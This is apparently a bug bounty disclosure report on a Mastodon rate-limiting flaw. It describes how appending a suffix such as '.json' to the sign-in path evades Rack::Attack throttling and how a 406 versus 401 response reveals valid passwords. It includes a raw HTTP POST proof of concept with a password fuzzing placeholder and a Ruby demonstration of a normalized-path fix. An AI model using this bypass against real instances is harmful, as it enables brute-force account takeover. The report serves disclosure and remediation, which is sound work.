Mastodon's Misconfigured Rack_Attack.rb Does Not Appropriately Protect Against Brute Force Attacks in mastodon/mastodon
Jun 20th 2022
Mastodon relies on the Rack_Attack.rb file to manage API throttling in the application through the declaration of absolute paths (e.g., /auth/sign_in). By appending random strings of characters to the end of the path in a POST request it is possible to bypass brute force protections. Tester attempted to file this finding through Intigriti as requested on GitHub; however, it is noted that Intigriti is phasing this project out. Tester used the staging.mastodon.social demo application, and also a local installation of the application, to confirm the vulnerability.
Tester was able to bypass sign-in restrictions by appending .json to the path; however, any string is viable. It was possible to identify valid passwords based on a 406 response from the server, versus a 401 error for invalid credentials. Rack_Attack declares a limit of 300 requests per 5 minutes, which appears to be the only restriction that still applies. Provided an attacker stays below 300 requests in 5 minutes, it is possible to completely bypass all restrictions.
Note that the tester already has a proof-of-concept fix for the issue and is happy to work with the maintainer to fix it. Tester would ask that a bounty amount comparable to Intigriti's be applied by the maintainer, where the low end of a valid finding is 1,000 pounds and the high end is 20,000 pounds. Tester would have submitted through Intigriti had it not been for the pending closure of the program, unfortunately. Tester does realize that the prize pot is depleted on this platform, and it would be at the discretion of the maintainer to honor a payment or not. Either way, CVE status will be requested due to the severity of the finding.
Proof of Concept
POST /auth/sign_in.json HTTP/1.1
Host: staging.mastodon.social
Cookie: _mastodon_session=wM5JZ5uFbag8V81Jk2jWsVES1Gl8dkukxjZdaN%2FnNNHh9UFamiUn62zY8Mh9nR8zu82pD%2FddQndPV8rJTgIiMPppVybkaJ3ULzMmawkADNUvx7q9Lz8vmT0svrnKDfL9MqnQ5YhKEvIq6c3LPBM8O1U%2FT4qQk2FZIoyjc1S1O8kbBBj6eYztCHLDdC25PnZ9%2Fd0IOB2fEW9qDnvNrNzxw77UcgRHjt9GWCw%2BPTh1aBS6J8a9f94ZXf%2BlgE2dCubsH7V5PL8Ijuq1bsePt27q1Pb8TbXzCBaO%2FA%3D%3D--JIrYMu6fwlXhF3%2FU--cSi5lAMp4z2IyeM1WfCzdQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Origin: https://staging.mastodon.social
Dnt: 1
Referer: https://staging.mastodon.social/auth/sign_in
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

authenticity_token=1ItjuEy9z3KwYRBwjKswfJWvwnGXIrnLvn7AT2czIG1jYpaN193lao-RldsgPydOi06hRmp12FXs6zK0jd6sZA&user%5Bemail%5D=themayor%40intigriti.me&user%5Bpassword%5D=§testpasswordhere§&button=
None of the API endpoints noted in the Rack_Attack configuration appear to have appropriate constraints, which would allow comparable brute force attempts against each.
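The following Ruby is an added example, not Mastodon's own rack_attack.rb: it models the difference between a Rack::Attack throttle discriminator that compares the exact path and one that normalizes the path first, so that /auth/sign_in.json and /auth/sign_in/ are counted against the same limit. The Throttle class stands in for Rack::Attack's cache-backed counter, and the limit of 25, the 100 attempts and the IP 203.0.113.7 are constructed for the demonstration.

```ruby
# Added example, not Mastodon's rack_attack.rb. Throttle stands in for
# Rack::Attack's cache-backed counter; limit, paths and IP are constructed.
Request = Struct.new(:method, :path, :ip) do
  def post?
    method == 'POST'
  end
end

# Weak discriminator (the exact-path shape the report describes): any
# suffix such as ".json" or "/" makes this nil, so the request is never counted.
WEAK_LOGIN = ->(req) { req.post? && req.path == '/auth/sign_in' && req.ip }

# Hardened discriminator: normalize first, since Rails routes
# "/auth/sign_in.json" and "/auth/sign_in/" to the same action.
def normalize_path(path)
  path.sub(%r{/+\z}, '').sub(/\.[A-Za-z0-9]+\z/, '')
end
HARDENED_LOGIN = ->(req) { req.post? && normalize_path(req.path) == '/auth/sign_in' && req.ip }

class Throttle
  def initialize(limit, &discriminator)
    @limit = limit
    @discriminator = discriminator
    @counts = Hash.new(0)
  end

  # As in Rack::Attack, a nil/false discriminator exempts the request entirely.
  def allowed?(req)
    key = @discriminator.call(req)
    return true unless key
    @counts[key] += 1
    @counts[key] <= @limit
  end
end

# Sends `attempts` POSTs from one IP to `path`; returns how many got through.
def attempts_allowed(discriminator, path, attempts, limit: 25)
  throttle = Throttle.new(limit, &discriminator)
  (1..attempts).count { throttle.allowed?(Request.new('POST', path, '203.0.113.7')) }
end

if __FILE__ == $PROGRAM_NAME
  %w[/auth/sign_in /auth/sign_in.json /auth/sign_in/].each do |p|
    puts format('%-19s weak: %3d  hardened: %3d', p,
                attempts_allowed(WEAK_LOGIN, p, 100), attempts_allowed(HARDENED_LOGIN, p, 100))
  end
end
```

With the weak discriminator only the bare path is ever limited (25 of 100 pass) while every suffixed variant lets all 100 through; the normalized discriminator holds all three variants to 25.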
See the following link for a screenshot with bypass responses and times: https://www.notion.so/themayor/Mastadon-Rack-Attack-7e665d571f4f407286480409594ef916
The impact of this vulnerability is that an attacker can brute force logins or other API calls in the application without threat of throttling or IP blocking.
Tester has a tested proof of concept locally that they are willing to share with the maintainer once a conversation has taken place on an appropriate bounty payment, if applicable.